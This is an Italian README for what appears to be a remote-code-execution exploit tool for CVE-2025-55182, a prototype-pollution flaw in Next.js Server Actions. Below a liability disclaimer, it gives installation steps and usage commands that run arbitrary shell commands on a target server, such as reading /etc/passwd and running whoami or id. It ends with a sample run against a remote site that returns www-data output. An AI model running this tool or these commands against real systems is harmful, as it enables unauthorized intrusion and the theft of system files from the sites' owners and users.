
CVE-2025-55182 Strumento di exploit RCE per Next.js
Documentazione in cinese | Analisi della vulnerabilità
[!CAUTION]
⚠️ AVVERTENZA - LEGGERE PRIMA DELL'USO
Questo strumento è destinato SOLO a:
- Ricercatori di sicurezza che conducono la verifica di vulnerabilità
- Test di penetrazione autorizzati con permesso esplicito
- Scopi educativi e di apprendimento
L'accesso non autorizzato a sistemi informatici è ILLEGALE.
Utilizzando questo strumento, accetti che:
- Hai ottenuto la dovuta autorizzazione prima di testare qualsiasi sistema
- Non userai questo strumento per scopi dannosi
- Sei l'unico responsabile delle tue azioni e di qualsiasi conseguenza
L'autore non si assume ALCUNA responsabilità per un uso improprio di questo strumento.
Uno strumento di exploit per l'esecuzione remota di codice (RCE) per la vulnerabilità di prototype pollution lato server di Next.js.
CVE-2025-55182 è una vulnerabilità di sicurezza critica che colpisce Next.js e consente agli attaccanti di ottenere l'esecuzione remota di codice tramite richieste appositamente formulate che sfruttano la prototype pollution.
📖 Per un'analisi tecnica dettagliata, consulta EXPLOIT.md
Questa vulnerabilità sfrutta il meccanismo di gestione delle richieste Server Actions di Next.js, ottenendo l'esecuzione arbitraria di codice tramite la contaminazione della catena del prototipo __proto__ combinata con il costruttore Function.
# Using yarn
yarn install
# Using npm
npm install
# Basic usage
node index.js <target_url> [command]
# Examples
node index.js http://localhost:3000
node index.js http://localhost:3000 "ls -la"
node index.js http://localhost:3000 "cat /etc/passwd"
# Run the tool
yarn start http://localhost:3000 "whoami"
# Or use alias
yarn exploit http://localhost:3000 "ls -la"
# Show help
yarn help
# Link globally
yarn link
# or
npm link
# Then use the command directly
cve-2025-55182 http://localhost:3000
cve-2025-55182 http://localhost:3000 "whoami"
# Unlink
yarn unlink
Usage:
cve-2025-55182 <url> [command]
Arguments:
url Target URL (required)
command Command to execute (default: whoami)
Options:
-h, --help Show help message
-v, --version Show version number
Lo strumento restituisce i risultati in formato JSON:
{
"success": true,
"message": "",
"data": "command execution result"
}
{
"success": false,
"message": "error message",
"data": null
}
$ cve-2025-55182 http://vulnerable-site.com "id"
{
"success": true,
"message": "",
"data": "uid=1000(www-data) gid=1000(www-data) groups=1000(www-data)"
}